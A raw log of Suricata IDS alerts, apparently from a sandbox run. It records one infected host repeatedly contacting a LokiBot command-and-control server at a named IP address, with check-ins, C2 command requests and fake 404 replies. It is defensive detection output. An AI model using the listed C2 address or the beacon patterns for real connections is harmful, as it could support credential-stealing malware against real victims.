                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49948 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49930 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49880 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49839 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49849 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49849 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49839 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49918 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49918 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49918 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49918 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49791 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49791 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49791 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49971 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49971 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49971 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49976 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49839 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49909 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49791 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49791 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49839 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49829 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49820 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49820 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49918 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49829
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49820 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49943 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49918
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49971 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49966 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49948 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49966 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49844 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49966 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49909 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49948
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49976 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49976 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49710
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49930
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49971 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49982 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49966 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49880 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49880 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49844 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49844 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49982 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49903 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49903 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49880 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49935 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49935 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49935 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49971
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49844 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49844 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49966 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49874
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49844
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49849 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49903 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49966
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49880 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49982 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49976 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49976 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49839
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49849 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49909
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49903 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49982 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49943 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49943 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49943 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49791
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49982 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49820 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49976
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49935 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49880
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49716
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49903 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49928 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49928 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49914 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49928 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49914 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49943
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49928 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49928 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49903
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49935 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49914 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49922 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49922 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49922 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49914 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49982
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49808 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49808 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49808 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49885 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49885 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49885 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49849 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49820
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49854 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49849
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49854
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49823 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49823 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49823 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49823 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49823 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49914 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49962 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49962 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49885 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49935
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49922 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49914
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50000 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50000 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50000 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49962 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49885 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49823
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49922 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49808 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49987 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49808 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49885
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50000 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49987
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50000 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50009 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49750 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49958 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:50000
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49922
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49962 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49962 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49962
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49995 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49995 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49995 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49808
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49995 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49995 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:49864 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49995
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49864
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:50004 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:50004 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:50004 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.7:49889 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.7:49889 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.7:49889 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.7:49958
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:50004 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.7:50004 -> 94.156.177.41:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.7:49889 -> 94.156.177.41:80
